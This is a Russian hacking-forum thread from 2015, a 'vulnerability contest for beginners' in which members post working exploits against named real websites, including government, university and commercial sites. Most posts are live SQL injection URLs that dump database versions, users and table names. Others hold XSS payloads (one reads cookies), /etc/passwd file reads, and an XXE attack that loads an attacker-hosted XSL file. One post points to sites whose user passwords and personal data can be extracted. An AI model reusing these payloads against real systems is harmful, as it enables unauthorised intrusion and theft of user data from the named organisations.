Конкурс уязвимостей для новичков

Discussion in 'Песочница' started by yarbabin, 1 Jun 2015.

  1. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    225
    Likes Received:
    375
    Reputations:
    100
    target: http://som.adzu.edu.ph
    type: SQL Injection
    version: 10.0.20-MariaDB-log
    user: som@localhost
    Code:
    http://som.adzu.edu.ph/newsupdates/index.php?id=-1+union+select+1,version(),table_name,user(),5,6+from+information_schema.tables+--+

    target: http://www.bulsu.edu.ph
    type: SQL Injection
    version: 5.1.63-community-log
    user: bulsued_friedel@207.198.102.22
    Code:
    http://www.bulsu.edu.ph/footer.php?id=-2 UNION SELECT 1,table_name,3,4,5 FROM INFORMATION_SCHEMA.TABLES

    target: http://www.ntc.gov.ph
    type: SQL Injection
    version: 10.0.15-MariaDB
    user: root@localhost
    Code:
    http://www.ntc.gov.ph/announcements_news.php?id=-24+union+select+1,version(),user(),4,table_name,6,7+from+information_schema.tables+--+
    target: http://www.irishsanghatrust.ie
    type: SQL Injection
    version: 5.0.83-community
    user: u1094094_sangha@172.16.5.126
    Code:
    http://www.irishsanghatrust.ie/news.php?id=-33+union+select+1,version(),user(),4,5,6,7,table_name,9,10,11,12,13,141,15,16,17,18+from+information_schema.tables+--+

    target: http://www.mtzwear.com
    type: SQL Injection
    version: 5.5.10
    user: mtzwear.com@localhost

    Code:
    http://www.mtzwear.com/eng/art_catalogo.php?id=-43 union select 1,2,3,4,5,6,7,8,table_name,user(),11 from information_schema.tables

     
    #61 joelblack, 23 Jul 2015
    Last edited: 24 Jul 2015
  2. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    298
    Likes Received:
    19
    Reputations:
    12
    Site: http://www.packsend.co.uk
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.packsend.co.uk/news.php?n=-1+UNION+SELECT+1,2,user(),4,5,6,7,8+--+
     
  3. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    225
    Likes Received:
    375
    Reputations:
    100
    target: http://www.romanianwriters.ro
    type: SQL Injection
    version: 5.1.61-0ubuntu0.10.10.1
    user: romanian_rowri@localhost

    Code:
    http://www.romanianwriters.ro/s.php?id=-1'+UNION+select+1,convert(table_name using latin1),3+from+information_schema.tables+limit+1,1+--+


    target: http://www.bransonparksandrecreation.com
    type: SQL Injection
    version: 5.0.96-log1
    user: bransonparks@173.201.216.51

    Code:
    http://www.bransonparksandrecreation.com/page.php?id=74 and(select 1 from(select count(*),concat((select (select concat(table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1+--+
    
    target: http://www.microtekusa.com/
    type: SQL Injection
    version: 5.0.77
    user: root@localhost

    Code:
    http://www.microtekusa.com/products.php?KindID=3&ID=-34+union+select+1,2,3,4,5,6,version(),user(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,table_name,57,58,59,60,61,62,63,64,65,66+from+information_schema.tables+--+

     
  4. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    212
    Likes Received:
    52
    Reputations:
    116
    Нашел на Рамблере XSS:
    Code:
    http://nova.rambler.ru/search?query=%3C%2Fa%3ELOL%3C%3E%3Cscript%3Ealert%28111%29%3B%3C%2Fscript%3E
    http://nova.rambler.ru/search?query=%3C%2Fa%3E%3C%3E%3Csvg%20onload%3D%27prompt%28111%29%27%3E
    
    Нашел на ukr.net
    Code:
    https://search.ukr.net/?q=%27%3Balert%28%2Fantichat%2F%29%3B+%2F%2F&cr=countryUA&lr=&as_qdr=&filter=&sitesearch=&safe=&related=&as_rq=&start=0
    А также, Чтение локальных файлов
    Code:
    http://probe.bvs.br/cgi-bin/wxis1660.exe/?IsisScript=/etc/passwd
    А также буду первым запостившим XML eXternal Entity
    Code:
    http://probe.bvs.br/transf.php?xml=news/3/1/20011213/2/body.xml&xsl=http://expdomain.esy.es/xml/my.xml
    Так как про этот тип уязвимости мало известно, немного комментариев:
    Уязвимость основана на трансформации xml - подключении внешней сущности. В xml файле сперва мы определяем сущность, которая например читает локальный файл
    Code:
    <!DOCTYPE hello [
    <!ENTITY passwd SYSTEM "file:///etc/passwd">
    ]>
    И потом выводим на экран &passwd;

    P.S. Извините, проверил топ-таблицу, оказывается я не первый
     
    #64 ocheretko, 26 Jul 2015
    Last edited: 26 Jul 2015
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    890
    Reputations:
    363
    таблицу обновил, всем добавил. прошу проверять на повторы: повторами считаются везде, где уязвимость выкладывали.
    вы первый. я себе XXE написал для примера, а вам добавил. хорошая работа :)
     
    _________________________
    ocheretko likes this.
  6. 3nvY

    3nvY Member

    Joined:
    8 Jun 2015
    Messages:
    45
    Likes Received:
    14
    Reputations:
    9
    Сайт: http://ww2.odu.edu
    Уязвимость: LFR
    Эксплоит:
    Code:
    http://ww2.odu.edu/ao/facultyhandbook/index.php?page=../index.php
    В исходниках страницы видно PHP код.:D Только это мало что даёт, по крайней мере для меня.
     
  7. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    225
    Likes Received:
    375
    Reputations:
    100
    target: http://www.cymbeline.com
    type: SQL Injection
    version: 5.1.73
    user: cymbeline@localhost
    Code:
    http://www.cymbeline.com/fr_FR/news/actualite.php5?id=-147+union+select+1,2,table_name,version(),5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+3,1+--+
    target: http://igamer.su
    type: SQL Injection
    version: 5.1.73
    user: db_user_igamer@localhost

    Code:
    http://igamer.su/news.php?id=-11+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+3,1+--+
    target: http://www.kirpichi.kz
    type: SQL Injection
    version: 5.5.44-cll-lve
    user: V_8337_KIRPICH@LOCALHOST
    Code:
    http://www.kirpichi.kz/?id=-7+union+select+1,2,version(),user(),5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+limit+3,1+--+&show=calc
    target: http://www.qbele.com.br
    type: SQL Injection
    version: 5.1.73-rel14.11-log
    user: site1371378569@186.202.153.159
    Code:
    http://www.qbele.com.br/index.php?id=-989'+union+select+1,2,3,4,5,6,version(),8,9,user(),table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+from+information_schema.tables+limit+3,1+--+&qCid=Todas

     
    #67 joelblack, 4 Aug 2015
    Last edited: 4 Aug 2015
  8. blud_niy

    blud_niy New Member

    Joined:
    26 Jul 2015
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Site: http://www.gorodokboxing.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.gorodokboxing.com/material.php?id=-2'+union+select+1,user(),3,4+--+
    Site: http://www.malnaditimudigere.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),version(),6,7,8,9+--+
    Site: http://glamdring.baac.or.th
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://glamdring.baac.or.th/tourism/preview.php?id=-7963'+union+select+1,version(),3,4,5,6,7,8+--+
    Site: http://web-sayansk.net
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://web-sayansk.net/view_games.php?id=-6'+union+select+1,2,3,4,user()+--+
    Site: http://www.replacement-windows.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.replacement-windows.com/window-board/read.php?id=-9960'+union+select+1,2,3,4,version(),6,table_name,8,9,10,user(),12,13,14,15,16,17,18,19+from+information_schema.tables+limit+1,1+--+
    Site: http://www.bellebuddy.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.bellebuddy.com/viewproduct.php?id=-311'+union+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
    Site: http://www.babilon-nyelvstudio.hu
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.babilon-nyelvstudio.hu/page.php?id=-305'+union+select+1,2,3,4,5,6,version(),user(),table_name,10,11,12,13,14,15,16+from+information_schema.tables+limit+3,1+--+
     
    #68 blud_niy, 7 Aug 2015
    Last edited: 7 Aug 2015
  9. blud_niy

    blud_niy New Member

    Joined:
    26 Jul 2015
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    подскажите... а что, конкурс уже завершился?
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    890
    Reputations:
    363
    нет, добавляю по возможности
     
    _________________________
  11. comstream

    comstream Member

    Joined:
    11 Aug 2015
    Messages:
    35
    Likes Received:
    10
    Reputations:
    0
    Site: cc-comics.pl
    Уязвимость: Local File Inclusion
    Эксплоит:
    Code:
    http://cc-comics.pl/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
    Site: www.ctpart.com
    Уязвимость: Local File Inclusion
    Code:
    http://www.ctpart.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
     
  12. comstream

    comstream Member

    Joined:
    11 Aug 2015
    Messages:
    35
    Likes Received:
    10
    Reputations:
    0
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    890
    Reputations:
    363
    добавил
     
    _________________________
  14. comstream

    comstream Member

    Joined:
    11 Aug 2015
    Messages:
    35
    Likes Received:
    10
    Reputations:
    0
    Сайт : http://mod.gov.kz
    Уязвимость: XSS
    Эксплоит:
    Code:
    mod.gov.kz/kaz/akciya_k_70yu_letiyu/foto_akciya'"()%26%25<acx><ScRiPt >alert(document.cookie)</ScRiPt>/
     
  15. Metal-Core

    Metal-Core Member

    Joined:
    20 Sep 2011
    Messages:
    156
    Likes Received:
    14
    Reputations:
    0
    vikii likes this.
  16. Strannik1236

    Strannik1236 Member

    Joined:
    6 Sep 2015
    Messages:
    11
    Likes Received:
    13
    Reputations:
    0
    Сколько уязвимостей надо найти и что получит победитель?
     
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    890
    Reputations:
    363
    перечитайте первое сообщение
     
    _________________________
  18. blud_niy

    blud_niy New Member

    Joined:
    26 Jul 2015
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Site: thewhole9.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.thewhole9.com/event_read.php?id=-2594'+union+select+1,2,version(),4,5,6,7,8,9,user(),table_name,12,13,14,15,16,17+from+information_schema.tables+limit+3,1+--+
    Site: domainefoivos.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.domainefoivos.com/news-read.php?id=-10'+union+select+1,version(),3,4,5,table_name,7,8,9,10+from+information_schema.tables+limit+3,1+--+
    Site: zupa.pregrada.hr
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.zupa.pregrada.hr/story.php?id=-276'+union+select+1,version(),3,4,user(),6+--+
    Site: obfzgalanta.sk
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://obfzgalanta.sk/uniweb/article.php?id=-2719'+union+select+1,version(),3,table_name,user()+from+information_schema.tables+limit+3,1+--+
    Site: obfztopolcany.sk
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.obfztopolcany.sk/uniweb/article.php?id=-3178'+union+select+1,version(),3,table_name,user()+from+information_schema.tables+limit+3,1+--+
    Site: letzzep.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.letzzep.com/reviewpop.php?id=-30'+union+select+1,table_name,3,4,5,user(),version(),8+from+information_schema.tables+limit+3,1+--+
    Site: agrovolyn.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://agrovolyn.com/news.php?id=-657'+union+select+1,version(),table_name,4,5,6,user()+from+information_schema.tables+limit+3,1+--+
    Site: siempreenplay.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.siempreenplay.com/EstudiosCientificos_post.php?id=-16'+union+select+1,2,3,4,5,table_name,7,8,9,10+from+information_schema.tables+limit+3,1+--+
    Site: kmbajwa.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://kmbajwa.com/page.php?id=-9'+union+select+1,version(),table_name+from+information_schema.tables+limit+4,1+--+
    Site: bhajanawali.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.bhajanawali.com/reading-den/read.php?id=-10'+union+select+1,table_name,3,4+from+information_schema.tables+limit+4,1+--+
     
  19. ubepkr

    ubepkr Member

    Joined:
    17 Aug 2015
    Messages:
    96
    Likes Received:
    20
    Reputations:
    1
    Всем привет!
    В ручную пока не особо получается раскручивать, посему не вините))

    http://www.24open-casino.com//index.php?act=games&hall=playtech&p= - интернет-казино, на сайте вообще куча косяков с SQLi и XSS, база элементарно вытаскивается, пароли в MD5, куча личной инфы по пользователям.

    http://www.fortunataptr.pl/scripts/runner.php?GA= - мыла с акками, пароли в MD5 (SQLi);

    http://www.frisbyracetire.net/showproducts.php?catid=2&subcatid= - пароли без шифрования (SQLi);

    http://www.yickyak.net/categories.php?catid= - пароли в MD5 (SQLi);

    http://www.beavercreekrental.net/RentalCategoryDetails.asp?category_id= - пароли без шифрования (SQLi).
     
    #79 ubepkr, 21 Sep 2015
    Last edited: 28 Sep 2015
  20. Diadlo

    Diadlo New Member

    Joined:
    24 Sep 2015
    Messages:
    19
    Likes Received:
    3
    Reputations:
    0
    Сайт: www.metal-rules.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.metal-rules.com/polls/index.php?id=-1%27+UNION+SELECT+1,user(),3,version()+--+
    Заодно прошу подсказки. Это я упорот или там нет таблицы с пользователями?
     
    #80 Diadlo, 30 Sep 2015
    Last edited: 30 Sep 2015
Loading...